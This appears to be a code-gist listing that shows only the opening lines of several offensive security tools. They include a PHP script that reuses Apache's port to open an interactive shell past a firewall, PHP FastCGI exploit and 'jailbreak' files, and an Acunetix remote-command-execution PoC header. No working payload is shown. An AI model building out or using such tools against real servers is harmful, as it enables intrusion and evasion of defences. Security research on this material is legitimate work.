<?php | |
// | |
// port_reuse.php | |
// | |
// Created by wofeiwo <wofeiwo@80sec.com> on 2011-08-27. | |
// Copyright 2011 80sec. All rights reserved. | |
// Reuse Apache 80 port to spawn an interactive shell. Bypass the firewall. | |
// Note: Only available on PHP >= 5.3.6 with mod_php on apache. | |
// Usage: 1. Put the script on htdocs. | |
// 2. Get interactive shell: |
/* ivan(a.t)mysqlab.net */ | |
package main | |
import ( | |
"syscall" | |
"os" | |
"log" | |
) | |
func daemon(nochdir, noclose int) int { |
#!/usr/bin/python | |
# coding: utf-8 | |
# Author: wofeiwo@80sec.com | |
# Last modified: 2017-7-18 | |
# Note: Just for research purpose | |
import sys | |
import socket | |
import argparse | |
import requests |
#!/usr/bin/env python | |
# pylint: disable=W0622 | |
# Copyright (c) 2006 Allan Saddi <allan@saddi.com> | |
# Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info> | |
# All rights reserved. | |
# | |
# Redistribution and use in source and binary forms, with or without | |
# modification, are permitted provided that the following conditions | |
# are met: |
<?php | |
/** | |
* PHP 5.3.3+ FASTCGI jailbreak | |
* | |
* @author wofeiwo <wofeiwo#80sec.com> | |
* @date 2013-01-23 | |
* @version 1.0 | |
* @reference https://bugs.php.net/bug.php?id=64103 | |
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese) | |
* @note disable php security settings, but can't overwrite disable_function/disable_classes. |
// PHP FastCGI remote exploit | |
// Date: 2012-09-15 | |
// Author: wofeiwo@80sec.com | |
// Note: Just for research purpose | |
package main | |
import ( | |
"./fcgiclient" | |
"fmt" |
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
# Turns off urllib3's InsecureRequestWarning for the whole process.
# NOTE(review): presumably the requests made later in this script disable
# certificate verification — confirm against the rest of the file. With the
# warning silenced, nothing at runtime signals that TLS peers go unverified.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
def payload_command (command_in): | |
html_escape_table = { | |
"&": "&", | |
'"': """, |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" | |
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa | |
This PoC exploits 2 vulnerabilities in Acunetix core: the first one is an RCE (Remote Command Exec) and the second one is | |
an LPE (Local Privilege Escalation). | |
All credit for this exploit goes to Daniele Linguaglossa | |
""" |
// Copyright 2012 Junqing Tan <ivan@mysqlab.net> and The Go Authors | |
// Use of this source code is governed by a BSD-style | |
// Part of source code is from Go fcgi package | |
// Fix bug: Can't receive more than 1 record until FCGI_END_REQUEST 2012-09-15 | |
// By: wofeiwo | |
package fcgiclient | |
import ( |
package main | |
import ( | |
"io" | |
"os" | |
"bufio" | |
"bytes" | |
"fmt" | |
"strings" | |
) |